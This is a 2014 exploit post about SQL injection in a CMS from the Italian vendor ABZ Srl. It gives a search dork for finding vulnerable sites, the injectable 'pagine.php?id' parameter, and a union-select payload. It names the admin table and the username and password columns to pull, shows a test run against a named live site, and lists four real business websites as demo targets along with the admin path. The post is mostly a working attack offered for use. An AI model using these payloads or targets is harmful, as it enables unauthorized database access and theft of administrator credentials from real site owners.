[+] Exploit Title: (ABZ Srl) Cms SQL Injection
[+] Exploit Author: Medrik
[+] Found Date: 13-03-2014
[+] Vendor Homepage: http://www.abzsrl.com/
[+] Google Dork: intext:"powered by ABZ Srl" inurl:pagine.php?id=
[+] Tested on: Windows

==========================================
[+] Exploit (Vulnerability Locate):

http://[vulnerable_host]/pagine.php?id=IdNumber[SQLi]

You Can Inject This SQLi Vuln With Some Tools Like SqlMap Or Other Tools .


[*] Important Table : AMMINISTRAZIONE

[*] Important Columns : For User :  [ USERN ]   & For Password : [ PSWD ]

[*] Example Poc For Database Version :    +/*!union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--

[*] Test : http://www.reginanewhouse.com/pagine.php?id=2+/*!union*/+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[*] Response For Test : 5.5.36-34.2-log

[*] Admin Page :  /admin   [*]

[*] Image : http://i.imgur.com/wNAWyBI.png

==========================================

[+] Demo (s) :

(#) http://www.reginanewhouse.com/pagine.php?id=2[SQli]
(#) http://www.gruppo-ria.com/pagine.php?id=2[SQli]
(#) http://www.euroxoro-torino.it/pagine.php?id=7[SQli]
(#) http://www.dimsegnaletica.com/pagine.php?id=4[SQli]

==========================================

[+] Gr33tz :

R33VES , Enddo , Beni_Vanda , Explo!ter , Black.KinG , M.R.S.CO , MR.0x41 , Dr.3v1l

==========================================